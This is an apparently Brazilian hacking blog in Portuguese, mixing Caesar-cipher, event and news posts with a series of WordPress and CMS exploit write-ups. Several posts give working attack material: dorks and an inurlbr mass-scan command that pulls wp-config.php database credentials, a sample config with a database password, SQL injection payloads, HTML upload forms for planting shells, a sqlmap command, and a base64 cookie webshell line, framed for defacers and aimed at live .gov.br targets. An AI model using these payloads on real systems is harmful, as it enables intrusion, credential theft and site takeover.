Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador hacking. Mostrar todas as postagens
Mostrando postagens com marcador hacking. Mostrar todas as postagens

segunda-feira, 6 de julho de 2015

Cifra de César

  #Cifra de César em Python


   Neste ultimo fim de semana, eu estava pesquisando sobre uma organização chamada Cicada 3301 que tem como principal objetivo o recrutamento de usuários altamente inteligentes em todo o mundo para um objetivo totalmente desconhecido. Uma espécie de (quebra-cabeça, desafio, enigma) ou como você quiser chamar era o método de recrutamento da Cicada 3301 (Mas informações). Pesquisando sobre os tipos de desafios que a cicada utilizava, um deles era codificação de mensagens usando a clássica Cifra de César (Júlio César a usava para passar informações confidenciais nos tempos de Roma).     A Cifra de César era basicamente o seguinte, Era a substituição das letras da mensagem a ser criptografada por seus sucessores no alfabeto de acordo com a sua chave.

 Eae seus putos, jh00n aqui novamente com vocês.

   Neste ultimo fim de semana, eu estava pesquisando sobre uma organização chamada Cicada 3301 que tem como principal objetivo o recrutamento de usuários altamente inteligentes em todo o mundo para um objetivo totalmente desconhecido. Uma espécie de (quebra-cabeça, desafio, enigma) ou como você quiser chamar era o método de recrutamento da Cicada 3301 (Mas informações). Pesquisando sobre os tipos de desafios que a cicada utilizava, um deles era codificação de mensagens usando a clássica Cifra de César (Júlio César a usava para passar informações confidenciais nos tempos de Roma).

   A Cifra de César era basicamente o seguinte, Era a substituição das letras da mensagem a ser criptografada por seus sucessores no alfabeto de acordo com a sua chave.

  •  Criptografando
            Chave 3
            Alfabeto: "abcdefghijklmnopqrstuvwxyz"
            Mensagem a ser criptografada: "aka"

            Neste caso você conta 3(Chave) casas a frente das letras "a","k","a" ficando assim: dnd.
  •  Descriptografando
            Chave 3
            Mensagem a ser descriptografada: "dnd"

            Funciona basicamente ao contrario você só ira precisar da chave, neste caso você conta 3 casa
           para trás retornando a mensagem original: aka.


    Então decidir fazer um programa em Python que encripta  e decripta frases utilizando a Cifra de César.
https://github.com/jh00nbr/Python/blob/master/cifradecesar.py

sábado, 4 de outubro de 2014

CMS Based

CMS Bas3d é um scanner para CMSs, o objetivo desta ferramenta é analisar o alvo e procurar por possíveis vulnerabilidades que tenham sido publicadas pelo 1337day, exploit-db ou cxsecurity.

A ferramenta não faz uma vasta varredura no alvo, apenas pega a "source html" e 'trabalha com o que encontra', sendo assim, se a tool verificar que o alvo roda WordPress 2.8.5, a mesma irá lhe indicar os links das vulnerabilidades/exploits que PODEM funcionar com esta versão do WordPress.

Além de realizar este scan, você também tem a opção de verificar qual CMS esta rodando no alvo.

Abaixo esta a lista de quais CMS estão disponíveis para scan e quais estão disponíveis para verificação:

O scan funciona com as seguintes CMSs:
 -Joomla
 -b2evolution
 -XOOPS
 -Moodle
 -SMF
 -PHP-Nuke
 -WORDPRESS
 -PostNuke
 -VBULLETIN
 -PHPBB
 -MYBB
 -DRUPAL
 -MODx
 -SilverStripe
 -Textpattern
 -Frog
 -AdaptCMS


O identificador de CMSs é capaz de identificar cerca de 40 CMSs diferentes, sendo elas:
 -Joomla
 -AdaptCMS
 -Apache Roller
 -XOOPS
 -Frog
 -openCMS
 -SMF
 -Textpattern
 -Ametys
 -WordPress
 -ATutor
 -eXo Platform
 -vBulletin
 -b2evolution
 -DSpace
 -phpBB
 -Moodle
 -DotCMS
 -MyBB
 -PHP-Nuke
 -Composite C1
 -Drupal
 -PostNuke
 -DotNetNuke
 -MODx
 -SilverStripe
 -mojoPortal
 -phpVibe
 -Umbraco
 -BEdita
 -Chevereto
 -CMSimple
 -CMSimple_XH
 -Concrete
 -Cotonti
 -Directus
 -DokuWiki
 -Dotclear
 -Magento
 -Geeklog
 -Plone

Para utilizar a ferramenta é simples, a baixo esta comandos que vocês podem utilizar:

Scan com o objetivo de encontrar vulnerabilidades:
  perl ./cmsbas3d.pl [website]


Scan para verificar qual CMS esta rodando:
  perl ./cmsbas3d.pl vcms [website]


Atualizar:
  perl ./cmsbas3d.pl update
 
 
Exibir ajuda:
  perl ./cmsbas3d.pl help


Você pode realizar o "download" mais rapidamente 'clonando' o projeto pelo terminal!
  git clone https://github.com/7mm5ll/CMS_Bas3d.git CMS_Bas3d
 

Nota: O script roda apenas no Linux!


Disponível em:
https://github.com/7mm5ll/CMS_Bas3d

sábado, 13 de setembro de 2014

0xHacking Antifascista

Hack (do verbo Inglês "to hack", que significa "cortar")1 é um termo que refere-se à reconfiguração ou reprogramação de um sistema de função de forma que não autorizada pelo proprietário, administrador ou designer. O termo tem vários significados relacionados com a tecnologia e ciência de computação: pode se referir a uma correção ou melhoria rápida e inteligente de um problema de programa de computado.  Hack ou hacking antes de tudo é uma ideologia de união na internet, Cogido livre, Acesso a informação e combate direto contra governo e seus meios de censura web.


Hack (do verbo Inglês "to hack", que significa "cortar")1 é um termo que refere-se à reconfiguração ou reprogramação de um sistema de função de forma que não autorizada pelo proprietário, administrador ou designer. O termo tem vários significados relacionados com a tecnologia e ciência de computação: pode se referir a uma correção ou melhoria rápida e inteligente de um problema de programa de computado.

Hack ou hacking antes de tudo é uma ideologia de união na internet,
Código livre, Acesso a informação e combate direto contra governo e seus meios de censura web.

- Hacking vai além do deface e um By meunome.
- Hacking é subversão.
- Hacking é compartilhamento livre do conhecimento.

Foi dessa ideologia que surgiu o Cypherpunk onde seu principal objetivo é usar criptografia como arma.

Com o grande poder que hoje é contido na internet governos, grupos fascistas, pedófilos, religiosos extremistas entre outros círculos de "cidadãos de bem" tem alastrado-se igual um worms, propagando ameças, comentários racistas & machistas entre os outros de extremismos conservador.

Uma pesquisa rápida no Facebook/Google podemos encontrar desde paginas que propagam racismo a pages propagam ideias de estupros que caracterizam a mulher como ser inferior.

Então fica uma dica pra quem está querendo conhecer o mundo hacking ou que já está nele.
- Hacking é subversão e não cooperação com sistema.
- Hacking é ação direta contra grupos de repressão,censura ou que propagam ódio, E não o site da padaria pra por no seu ZONE-H.

De todos para todos:

Neither war between hackers, nor peace for the system.
Devemos combater o fascismo dentro e fora da internet.

Conheça um pouco do Antifascismo 

# Antifascismo -

Luta absoluta contra o fascismo, nazismo, golpismo, capitalismo, racismo, machismo, homofobia, transfobia, xenofobia e todos os extremismos conservadores que estão inseridos na sociedade através de discursos tendenciosos.

# Como surgiu -

A Ação Antifascista nasceu da união entre os anarquistas e os comunistas tendo um único inimigo em comum: o fascismo. Essa união se deu não através de idealizações políticas em grupos com características próprias mas, sim através da realidade cotidiana ao analisar a sociedade e perceber o risco eminente de uma extrema-direita forte, com poderes institucionais ou militares.
Como a história nos mostra, esses totalitarismos políticos/ideológicos são um risco a liberdade de expressão cultural e social, por isso é de total importância a formação de um movimento unido contra esses grupos intolerantes que almejam o poder político dentro de nossas cidades.
O nazismo e outros regimes totalitários demonstraram uma necessidade urgente de colocar dentro do nosso cotidiano uma cultura antifascista, negando, desse modo, qualquer valor que incentive o fundamentalismo/dogmatismo.
A tendência antifascista é libertária, pois, se coloca contrária aos sectarismos dos grupos que combatemos, ou seja, todos que compartilham das mesmas ideias são bem-vindos.
Todos que desejam levantar a bandeira da luta antifascista devem abandonar posturas machistas, sexistas, transfobicas, homofóbicas, misógenas, xenofobicas, extremismos religiosos/ideológicos, nacionalismos e tudo aquilo que não tenha coerência com o histórico de luta da Ação Antifascista em todos os seus anos de combate a opressão tanto da sociedade como do sistema.

# Métodos -

Ação Direta.

A ação direta sempre foi uma das principais características da luta antifascista, surgindo como uma resposta agressiva a intolerância da extrema-direita. Conhecendo a realidade das ruas, sabemos que existem grupos que perseguem e utilizam da violência para coagir todos aqueles que são contrários ao seu modelo de sociedade perfeita. White Powers (nazistas), carecas (nacionalistas), integralistas entre outros, espalham discursos de ódio utilizando o medo para atingir seus objetivos. Por este motivo, a autodefesa é algo de extrema importância para nossa integridade física meio a uma ameaça de agressão, afinal, com esses militantes não existe o diálogo.
Por compreender a importância de uma linha de frente forte contra esses grupos nas ruas, muitos Antifas organizam grupos autônomos em suas regiões e combatem o fascismo de forma mais exaltada e prática. O objetivo é fazer os radicais da extrema-direita retrocederem em suas perseguições a pessoas desprotegidas e limpar regiões de grupos extremistas que possam vir a agredir outras pessoas. Esses grupos Antifas atuam de forma descentralizada e sem lideranças; respondem às necessidades dos respectivos lugares que residem; carregam características próprias ideologicamente e culturalmente falando, porém com um objetivo em comum: lutar contra o fascismo.

Conhecimento.

Estudar é importante principalmente para você não se tornar aquilo que combate, para saber criticar aquilo que se critica e o por que de criticar. Talvez esse seja o principal método de se combater o fascismo e seus adjetivos. Conhecer, entender e refletir é o caminho mais seguro para uma consciência tranquila.
Não tenha preguiça! Leia...

Intervenção.

A intervenção é outra ação importante dentro do antifascismo, através dela fortalecemos a oposição ao fascismo.
A arte sempre foi ligada ao movimento antifascista pois com ela podemos passar mensagens muito mais profundas, ela fortalece a reflexão,
utilizamos a subversão no lugar da doutrinação.
Posters colados nas ruas, stencils, grafites, tudo aquilo que for divulgar o movimento é de extrema importância. Quanto mais mostrarmos que estamos nas ruas, mais intimidaremos os grupos que combatemos e instigaremos a curiosidade das pessoas a respeito do assunto.

Mobilização popular.

Organizar movimentos e atos contra políticas e grupos conservadores que tentem se levantar como alternativa é de extrema necessidade, lembrando que um antifascista nunca impõe seu ideal e sim o defende! Todos devem estar dispostos a se unir nas ruas contra qualquer ameaça fascista que venha surgir.

# Organização -

A ação antifascista nunca foi um movimento de unidade e institucionalizado, ela mantém-se descentralizada e totalmente autônoma.
Existem diversos grupos e coletivos antifascistas que atuam em combate ao fascismo. Não existem lideranças nem hierarquias.
Cada célula tem seus critérios e métodos de ação, e tem total liberdade para militar da forma que acharem mais conveniente, sempre visando a coerência da bandeira Antifa.

# Objetivos - 

Jamais deixar movimentos totalitários crescerem em nossas cidades, combater grupos que utilizam da violência para espalhar intolerância, fortalecer seu local Antifa e ser solidário aos camaradas de luta.

Qualquer duvida nos mande mensagem via inbox.

Antifa Unida!
Nunca dividida!

https://www.facebook.com/AntifascistaBrasil/photos/pb.414425795343798.-2207520000.1410638585./609259885860387/?type=3&theater

https://pt.wikipedia.org/wiki/Cypherpunk

quarta-feira, 27 de agosto de 2014

WordPress Plugin KenBurner Slider LFD

[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo. Bom vamos la



[0x01] Dando continuidade aos pequenos bugs e grande dores de cabeças do WordPress novamente uma falha de LFD em um plugin usado por muitos sites todavia o afetado dessa vez é o KenBurner Slide a falha é bem semelhante ao do revslider na realidade é a mesma apenas mudando o alvo.
Bom vamos la



[0x02] Explorando com o Scanner inurlbr
Dork Index of /wp-content/plugins/kbslider

Comando

"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "

Resultado e novamente lhe retornara o wp-config.php contendo as infos do mysql do alvo
"./inurlbr.php --dork 'Index of /wp-content/plugins/kbslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' "



SCRIPT SCANNER INURLBR=> https://github.com/googleinurl/SCANNER-INURLBR
DD

quinta-feira, 7 de agosto de 2014

Pentest na vida real



Pentest na vida real por mais que muitos não percebam o hacking se torna algo frequente seja aquela mentirinha que tu conta quando chega atrasado no serviço que se encaixa em engenharia social ou qualquer coisa que você encontre que te ajudara a fazer algo de forma mais fácil quando o google glass foi anunciado creio que todos do cenário underground ficaram curiosos de como ele era produzido algum tempo apos foi postado um tutorial que usei como base em um fórum criando um óculos inteligente com raspberry pi apos alguns testes e um sucesso parcial pois o visor que é utilizado trata se de uma tecnologia militar mas a alfandega não deixa chega ao seu destino.
Em breves conversas na comunidade do WearableX decidir dentro de algum tempo cria um tutorial de como montar o óculos mas totalmente voltado para pentest alguma das características

Utilizara o kali linux
Leitura biométricas
Essas são as duas principais características o projeto sera de código aberto  assim todos poderam estuda acha bugs etc e deixa lo cada vez melhor.

terça-feira, 5 de agosto de 2014

Bicicletas do Itaú e seus usuários estão desprotegidos contra hackers

0xSegurança, um assunto que deve ser levado a sério 

0xSegurança, um assunto que deve ser levado a sério


Um dos grandes defeitos do ser humano — em especial de nós, brasileiros — é o de postergar assuntos que não domina ou que desconhece. Por uma falta de interesse alinhada a pouca ou nenhuma experiência, grande parte das pessoas coloca de lado tópicos importantes, como por exemplo segurança da informação. Dominar todas as áreas do conhecimento é humanamente impossível, mas em pleno século XXI, em meio à era da tecnologia e da informação, negligenciar esse tipo de assunto é o mesmo que assumir o declínio, às vezes, de todo um projeto.

Em março de 2013, enquanto escrevia a série “Segurança no mundo Apple”, publiquei um artigo com o tema “Desenvolvimento seguro” e, na época, analisei os 50 apps brasileiros que lideravam o ranking das categorias ou por proverem serviços que podem chamar a atenção de hackers. O resultado foi alarmante: dos 50 apps analisados, 42 apresentaram algum tipo de falha de segurança e 35 tinham falhas de segurança críticas que comprometiam o aplicativo ou o servidor remoto.

Entretanto, o pior dado foi o do descaso quanto aos dados — exceto da equipe do Serpro, por estarmos alinhados em treinamentos ministrados por mim que aconteceram internamente para equipes de desenvolvimento. Nenhum outro desenvolvedor me procurou ou tomou algum tipo de precaução, mesmo meses depois de tornadas públicas as falhas.

Entretanto, o pior dado foi o do descaso quanto aos dados — exceto da equipe do Serpro, por estarmos alinhados em treinamentos ministrados por mim que aconteceram internamente para equipes de desenvolvimento. Nenhum outro desenvolvedor me procurou ou tomou algum tipo de precaução, mesmo meses depois de tornadas públicas as falhas.

Decidi colocar novamente o assunto apps e segurança em questão, em virtude da importância e dos riscos tanto para os desenvolvedores quanto para os usuários dos serviços afetados. Desta vez, optei por analisar um app que fosse conhecido por todos e que o resultado final pudesse ser comprovado sem a necessidade de divulgação dos dados sigilosos. O vídeo abaixo mostra a fragilidade do app envolvendo todo o sistema de controle de bicicletas compartilhadas espalhadas por diversas cidades no Brasil.

A empresa responsável foi informada sobre os problemas em 25 de julho e está trabalhando para corrigir os problemas mencionados.


Bicicletas do Itaú e seus usuários estão desprotegidos contra hackers from Appreendedor on Vimeo.


FONTE:
http://macmagazine.com.br/2014/08/05/appreendedor-seguranca-um-assunto-que-deve-ser-levado-a-serio/?utm_source=website&utm_campaign=wordtwit&utm_medium=web

Wordpress Lead-Octopus-Power plugin SQL INJECTION


                             0x Wordpress Lead-Octopus-Power plugin SQL INJECTION

Seguindo a serie de como não cria uma cms ops digo de como pequenos bugs em grandes cms são extremamente perigosos e a cada dia acabam se tornando mais comum sendo na própria cms ou em Plugins como ocorre no WordPress ou component que ocorre no Joomla.
Bom vamos la mais uma vez um bug no WordPress explorando SQL INJECTION dessa vez em um plugin vamos ao POC da vulnerabilidade para podemos encontra sites com esse bug usaremos a seguinte 

Dork inurl:wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=  

A falha fica localizada em

site.gov.br/wp-content/plugins/Lead-Octopus-Power/lib/optin/optin_page.php?id=[SQL]

Atom CMS SQL Injection e file upload


0x Atom CMS SQL Injection e file upload 

Por ainda não ser uma cms com muita visibilidade na cena acho que ainda há poucos sites utilizando mas vamos lá atom é uma cms de código abeto se quiserem baixa la ela se encontra aqui 

0x Exploração 

SQL INJECTION

http://127.0.0.1/acms/admin/uploads.php?id=1 and(select 1 FROM(select
count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)

O site lhe retornara o nome do banco de dados na ultima linha da pagina

UPDATE users SET avatar = '1404709440490.' WHERE id = 1 and(select 1
FROM(select count(*),concat((select (select concat(database())) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
Duplicate entry 'acms1' for key 'group_key'

                                                                    FILE UPLOAD

Mais uma vez iremos salvar um pequeno codigo como xpl.html e executaremos via browser 

  1. <form action="http://127.0.0.1/atom_cms/admin/uploads.php"
  2. method="post"
  3. enctype="multipart/form-data">
  4. <label for="file">Filename:</label>
  5. <input type="file" name="file" id="file"><br>
  6. <input type="submit" name="submit" value="exploit">
  7. </form>

Obtendo acesso a shell 

http://127.0.0.1/atom_cms/uploads/

WordPress CopySafe PDF Protection 0.6 Shell Upload


0x WordPress CopySafe PDF Protection 0.6 Shell Upload

Continuando a serie de bugs voltados para o famoso wordpress dessa vez apresentamos um dos mais estúpidos que podem existir, esse bug possibilita o defacer fazer o upload de uma shell sem trabalho algum.
A vulnerabilidade fica alocada em lib/uploadify/uploadify.php com isso permite o upload de uma shell sem trabalho algum apos o upload a shell se aloca em http://site.gov.br/wp-content/uploads/shell.php
Bom mas vamos ao codigo do exploit que devera ser salvo como xpl.html no seu pc :)

  1. <form
  2. action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
  3. method="post"
  4. enctype="multipart/form-data">
  5. <label for="file">Filename:</label>
  6. <input type="file" name="wpcsp_file" ><br>
  7. <input type=text name="upload_path" value="../../../../uploads/">
  8. <input type="submit" name="submit" value="Submit">
  9. </form>




WordPress BSK PDF Manager 1.3.2 SQL Injection

WordPress BSK PDF Manager 1.3.2 SQL Injection

0x WordPress BSK PDF Manager 1.3.2 SQL Injection

O plug-in ajuda a gerenciar seus documentos PDF em WordPress. Você pode enviar por categorias e exibição caregories ou mostrar um documento especial PDF.
É fácil de utilizar. Você só precisa copiar os códigos de acesso para a página / post onde você quer mostrar. Em seguida, ele irá mostrar o link na sua página / post.
Widget é suportado agora! Você pode mostrar a lista de PDFs em uma área de widget.
Código vulnerável

  1. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
  2. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $categories_curr_view = trim($_GET['view']);
  3. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['categoryid']) && $_GET['categoryid']){
  4. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $category_id = trim($_GET['categoryid']);
  5. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
  6. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $lists_curr_view = trim($_GET['view']);
  7. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['pdfid']) && $_GET['pdfid']){
  8. bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $pdf_id = trim($_GET['pdfid']);
  9. $category_id = trim($_GET['categoryid']);
  10. $pdf_id = trim($_GET['pdfid']);

                                               0x Exploração via Browser e sqmlap

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2


sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid




segunda-feira, 4 de agosto de 2014

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


0x Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


Slider Revolution Responsive é um plugin do wordpress muito utilizado hoje em dia por sites que abortam diversos temas variando de sites governamentais ate mesmo sites de lojas uma falha que aos olhos de muitos poderia ser algo banal acabou virando uma grande dor de cabeça.
O bug permite a download do arquivo wp-config entre outros, no wp-config contem

  1. define('DB_NAME', 'lojaphos'); Nome do banco de dados
  2. define('DB_USER', 'lojaphos'); Usuário relativo ao banco que contem o Wordpress
  3. define('DB_PASSWORD', 'silva2805'); Senha do banco
  4. define('DB_HOST', 'mysql.phosloja.com.br'); normalmente estará como localhost
 0x Explorando 

            Dork revslider.php "index of"
            http://site.alvo/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.
Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.

 No vídeo abaixo demostra a exploração com o inurlbr
                                                                   

segunda-feira, 21 de julho de 2014

Testando novo Scanner inurl beta

BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS

                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]

#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR:    Cleiton Pinheiro
#Nick:     Googleinurl
#Blog:     http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão:  1.0
#-------------------------------------------------------------------------------
#PHP Version         5.4.7
#php5-curl           LIB
#php5-cli            LIB 
#cURL support        enabled
#cURL Information    7.24.0
#Apache              2.4
#allow_url_fopen     On
#permission          Reading & Writing
#User                root privilege, or is in the sudoers group
#Operating system    LINUX
#Proxy random        TOR               
#####################################

[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w

Testando novo Scanner inurl 1.0 beta

Testando novo Scanner inurl 1.0 beta


http://pastebin.com/Tb0Qp0qY

sexta-feira, 4 de abril de 2014

Venha para CRYPTORAVE em São Paulo


EVENTO CRYPTORAVE
 Entre os dias 11 e 12 de abril de 2014, no Centro Cultural São Paulo durante 24 horas, a CryptoRave trará mais de 28 atividades sobre segurança, criptografia, hacking, anonimato, privacidade e liberdade na rede.  A CryptoRave inspira-se na ação global e descentralizada da CryptoParty, a qual têm como objetivo difundir os conceitos fundamentais e softwares básicos de criptografia.  A participação das atividades é aberta mediante a inscrição online gratuita.  Local: Centro Cultural São Paulo, Rua Vergueiro, 1000, entrada pelo piso Caio Graco, próximo a estação Vergueiro do Metrô - São Paulo  Data: das 19h do dia 11 até a noite do Sábado 12 de Abril

Entre os dias 11 e 12 de abril de 2014, no Centro Cultural São Paulo durante 24 horas, a CryptoRave trará mais de 28 atividades sobre segurança, criptografia, hacking, anonimato, privacidade e liberdade na rede.

A CryptoRave inspira-se na ação global e descentralizada da CryptoParty, a qual têm como objetivo difundir os conceitos fundamentais e softwares básicos de criptografia.

A participação das atividades é aberta mediante a inscrição online gratuita.

Local: Centro Cultural São Paulo, Rua Vergueiro, 1000, entrada pelo piso Caio Graco, próximo a estação Vergueiro do Metrô - São Paulo

Data: das 19h do dia 11 até a noite do Sábado 12 de Abril

$Acesselink->md5(https://cryptorave.org/);

terça-feira, 7 de janeiro de 2014

Webshell via COOKIE


O Script feito em PHP usa COOKIE uma variável global em vez de GET e POST em sua WebShell para ser mais furtivo.
Escrito por Ahmed Shawky @lnxg33k
O código a seguir é uma alternativa para os métodos GET e POST
como ele usa uma variável global _COOKIE.
Deve funcionar da seguinte forma:

system(base64_decode($_COOKIE["1"]));


O código feito em Python, Explora isso abrindo um terminal para execução dos comandos desejados.
Executando:
./cookie.py http://alvo.com.br/cookie.php


Executando: ./cookie.py http://alvo.com.br/cookie.php


#BAIXAR https://github.com/lnxg33k/misc/blob/master/cookie.py

terça-feira, 22 de outubro de 2013

0x Dns hijacking + Google hacking e engenaria social 0x

0x Dns hijacking + Google hacking e engenaria social 0x

0x Dns hijacking + Google hacking e engenaria social 0x

Como todos sabemos o elo mais fraco de qualquer sistema e o humano que facilmente pode ser enganado nos últimos dias vimos grandes ataques da kdms palestine team o exemplo que usarei nesse paper e a metasploit um grande icone haha
0x Entenda o ataque 0x
Uma brincadeira que chego a fazer e se os nego da palestina vim pro br desligo ate minha geladeira
Bom o ataque ao metasploit aconteceu da seguinte forma provavelmente um funcionário estava de resaca e receber um lindo fax com os nego da kdms se passando por um dos diretores pedindo acesso é o bom funcionário passou o acesso facil ne ?
como seria útil coloca um firewall ou um ant virus no humano rs.
Por um bom tempo uma prática conhecida como pentester físico foi utilizada (atividade ilustrada no filme hackers piratas)
bom mas por que o pentest físico ?
Bom meu caro sempre e bom da aqueka stalkeada basica rs tenta conquista a confiança e tenta suga alguma info por isso temos muitas meninas no meio do hacking altas E.S hahaha'

O que conseguiremos com o stalker bom muitas pessoas ainda escrevem senhas em papeis dados para lembra etc quando obter informações do tipo facilitará o diagnóstico de personalidade ou ate mesmo terá as senhas em mãos rs
0x DNS hijacking 0x
O ataque o ataque em si não prejudicar de nenhuma forma o conteúdo do site ele apenas alterá o dns.
muitas vezes o ataque para ser completo demora 48 horas tempo máximo para o dns fixá mas apos sofrê esse ataque se for comprovado a empresa e obrigada a recolocá o dns original na mesma hora por isso apos a avg o whatsapp e ate mesmo a metasploit sofre o sequestro de seu domínio o ficou off ate a regularização de dns
0x Google Hacking 0x
bom na parte relacionada a google hacking estarei citando a parte de d0xing que não e nada mais que uma busca voltada para empresa ou pessoa antes de tenta engenharia social e sempre bom saber amigos do alvo gostos etc.

Feito por :0x C0rPs3 0x
https://twitter.com/elC0rPs3

sexta-feira, 27 de setembro de 2013

Garoa Hacker Clube conheça essa idéia.

Com muito prazer venho divulgar o Garoa Hacker Clube.

Com muito prazer venho divulgar o Garoa Hacker Clube

O Garoa Hacker Clube ☂ é um hackerspace localizado na cidade de São Paulo.
Um hackerspace é um laboratório comunitário, aberto e colaborativo que propicia a troca de conhecimento através de uma infraestrutura para que entusiastas de tecnologia realizem projetos em diversas áreas, como eletrônica, software, robótica, segurança, espaçomodelismo, biologia, culinária, audiovisual e artes - ou o que mais a criatividade permitir.
Qualquer pessoa pode frequentar o Garoa gratuitamente, sendo associado ou não.

Conheça essa ideia:
https://garoa.net.br/wiki/Página_principal

sexta-feira, 30 de novembro de 2012

FBI foi invadido pelo grupo CR4WL3RS 294 senhas publicadas

   -- CR4WL3RS --  -- The Hackers Army -- FBI foi invadido pelo grupo CR4WL3RS 294 senhas publicadas
   -- CR4WL3RS --
 -- The Hackers Army --
 
*****************************
Autores:
#CR4WL3RS
#AnonBrazil
#AnonS@mbrio
#TheHackersArmy
 
 
Grupo hacking denominado  "CR4WL3RS", invadio o http://FBI.GOV/ Website Server Dox.

Publicando 294 senhas de usurários.

                          -- http://FBI.GOV/ Website Server Dox --
 
--------------------------------------------------------------------------
935 Pennsylvania Avenue Northwest Washington, DC 20535
(202) 324-3000
 
----------
A_RECORD
----------
Server: 8.8.8.8
Address: 8.8.8.8#53 (node - 53)
 
Canonical name = www.fbi.gov.c.footprint.net.
Name:www.fbi.gov.c.footprint.net
Address: 209.84.4.105
__________
MX_record
----------
Server: 4.2.2.5
Address: 4.2.2.5#53


Referencia: http://pastebin.com/kmNi1kag

segunda-feira, 1 de outubro de 2012

Pesquisador explicar como 4,5 milhões modems DSL foram cortados no Brasil no ano passado

Pesquisador explicar como 4,5 milhões modems DSL foram cortados no Brasil no ano passado



No final do ano passadoMais de 4,5 milhões de roteadores domésticos DSL no Brasil hackeado e roteador está configurado de tal forma que ele aponte para DNS maliciosos. O hack foi relatado por Fabio Assolini, pesquisador de segurança da Kaspersky.

Como o resultado do hack, quando um usuário tentar visitar google, facebook, youtube ou quaisquer outros sites, uma mensagem pop aconselhados a instalar o Google Defesa aplicativo para acessar sites. Naquele momento, não está claro qual é a razão por trás do ataque.

Na recente conferência Virus Bulletin, Assolini fez uma apresentação fascinante, descrevendo como milhões de roteadores DSL foram encontrados para ter sido silenciosamente hackeado por criminosos cibernéticos.

Segundo o relatório, a vulnerabilidade nos modems permitiu atacantes para acessar remotamente através da rede. Normalmente, se você acessar um roteador via rede, você será solicitado para credenciais de login.

Uma falha de segurança no chip Broadcom incluída em alguns roteadores, permite a um invasor executar um Cross Site Request Forgery (CSRF) no painel de administração do modem ADSL para capturar a senha.

Uma vez obtida a senha, os hackers modificado configurações de DNS de tal forma que quando o usuário tentar visitar sites legítimos, seriam redirecionados para sites maliciosos.

Em uma apresentação, Assolini apresentou um bate-papo IRC entre alguns dos hackers envolvidos no alcaparra DNS. Um deles descreveu como um outro hacker ganhou mais de 100 mil reais (cerca de US $ 50.000) e iria passar seus ganhos ilícitos em viagens para o Rio de Janeiro na companhia de prostitutas.

sábado, 11 de agosto de 2012

Dork busca vulnerabilidade de injeção SQL joomla.

Dork busca vulnerabilidade de injeção SQL joomla.

A vulnerabilidade de injeção SQL é detectado no módulo com_fireboard do Sistema de Gerenciamento de Conteúdo Joomla.
Atacantes remotos e de baixa contas de usuários privilegiados podem executar / injetar próprios comandos SQL para comprometer a aplicação SGBD.
A vulnerabilidade está localizado no módulo com_fireboard

Módulo vulnerável (s):
[+] index.php?option=com_fireboard

Parâmetro Vulnerável (s):
[+] func fb_

Prova de Conceito:
=================
A vulnerabilidade de injeção SQL pode ser explorada por atacantes remotos sem ação do usuário entre e com baixo
conta de usuário privilegiado.

Dork:inurl:"id=" & intext:"/com_fireboard/"


